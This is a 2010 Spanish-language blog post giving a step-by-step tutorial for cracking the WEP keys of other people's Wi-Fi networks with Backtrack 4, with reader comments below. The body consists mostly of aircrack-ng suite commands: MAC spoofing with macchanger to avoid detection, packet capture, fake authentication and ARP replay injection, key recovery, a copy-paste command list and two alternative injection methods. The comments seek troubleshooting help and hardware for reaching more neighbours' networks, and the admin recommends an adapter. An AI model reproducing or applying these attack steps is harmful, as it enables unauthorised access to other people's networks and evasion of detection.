NOTAS ACTUALES:

Backtrack 4 con tutorial para hackear claves WEP de redes Wi-fi

12 de mayo de 2010


Botón de descarga:


Tutorial de Manejo del Programa:

Cuando ya lo hayas bajado y quemado introduce el CD en tu cd/dvd-rom, reinicia la computadora y has que se inicie desde el cd de backtrack "en el arranque").

Cuando te pida usuario y contraseña usa los siguientes:

Usuario: root
Contraseña: toor
Introducelo todo en minusculas

Luego cuando esté cargada la pantalla del sistema escribe lo siguiente:

startx

Esto es para que se inicie el modo grafico.

Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y esta listo para ser utilizado.

Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:

airmon-ng

Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en éste caso es la wlan0.

Luego introduce los siguientes comandos:

airmon-ng stop wlan0
ifconfig wlan0 down


Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este con dos razones importantes:
1. Para que asi no haya problemas de que te puedan detectar e impedirte futuras conexiones y
2. Vas a necesitar el numero de mac mas adelante y esta es una facil de escribir y recordar.

Para cambiar la mac escribe los sigueintes comandos:

macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0


Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un poco este ultimo comando)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente comando:

airodump-ng wlan0

Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).

Se que son mas datos los que se muestran, pero esos no son de importancia, sólo vamos a utilizar los que mencioné.

Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.

Para explicar bien esta parte vamos a poner un ejemplo:

BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:

airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0

Donde:

-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes. Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar trafico en la red.

Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:

aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0

Donde:

-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.

Si por alguna razon no se puede conectar algunas de las razones son las siguientes:

-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques

Ahora para inyectarle el trafico introducce el siguientes comando:

aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Donde:

-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rapido.

Ahora abre otra terminal (consola) e introduce el siguiente comando:

aircrack-ng prueba-01.cap

Donde:

-Prueba-01.cap es el archivo donde se estan capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:

[XX:XX:XX:XX:XX:XX]

Donde las XX son las letras o numeros de la contraseña, por ejemplo:

Si te muestra [12:34:56:78:90]

La contraseña para esa red inalambrica seria 1234567890.

Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap

Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de hacer de una forma entendible, ya estoy trabajando en el video, asi que no se preocupen si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me han funcionado perfecto:

Forma 2:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -5 -b -h wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y -w ARP
# aireplay-ng -2 -r ARP wlan0
__
Tutorial explicado en video:


10 comentarios:

Red dijo...

Perfectísimo, muchas gracias por el aporte

NViktor dijo...

Hola, gracias por el tutorial. Cuando ejecuto el comando
"# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0"
para inyectar trafico me devuelve mucho un mensaje que dice..."Notice; got a deauth/disassoc packet. Is the source MAC associated?".
Ojala me puedas ayduar con esto. Gracias

SoftwareByte dijo...

Borra los archivos en donde guardabas los paquetes y vuelve a ejecutar los comandos o inicia de nuevo el programa. Si no funciona el comando "aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0" intenta con alguna otra de las formas de inyección mencionadas al último de éste tutorial.

Anónimo dijo...

sdd

Anónimo dijo...

hola yo intente la inyeccion con la forma 2 y los datas subian solos y consegui 800000 datas pero no daba con la clave me salia failed y que lo intentara mas adelante
sin embargo lo hice con otro programa y me la saco a los 40000 datas
ojala alguien me pueda decir cual es el problema de la forma 2 ya que los datas suben pero son reales o son de un paquete
espero su respuesta gracias

Anónimo dijo...

eso depende de que programa. mira como por ejemplo el wifiway los wlan_xx o jazztel_xx con 5 DATAS se saca la clabe pero utilizando la herramienta jazzteldescripter y wlandescripter

Anónimo dijo...

mis problemas son estos:
1 mi adaptador usb es chino es de 10dbi y 54mbps es bueno o me recomiendas otro.
2 ahora mi adaptador esta dentro de mi casa puedo comprarme un cable usb de 10 o 20 metros para subirlo al techo no perjudica en la señal o algo asi, eso es para q me agarre mas redes wifi.

AdminSB dijo...

Te recomiendo el adaptador Alfa Network AWUS036H. En cuanto a la señal, es recomendable tenerlo cerca de una ventana, no lo dejes fuera.

Anónimo dijo...

q osea eso del alfa network es como una especie de antena para mi adaptador usb o algo asi.....
2 yo tengo internet pero ya voy a desactibarlo, ahora me dado cuenta de q con mi antena q m puso el señor del internet puedo agarrar redes wifi es posible hackear redes para sacarle la clave te agradecerias si me respondes. gracias........ a me puedes dar tu face para cualquier consulta te lo digo por ahi el mio es pedro gavelan salcedo................. chevera ah!!!!!!!!!!! a x siaca soy el q te pregunto del adaptador usb chino

Anónimo dijo...

buenas tardes a mi no me deja grabarlo en un dvd

Publicar un comentario en la entrada

 

© Copyright KaosByte 2010 -2011 | Design by SoftwareByte LG | Published by Kaos Wrestling | Powered by Blogger.com.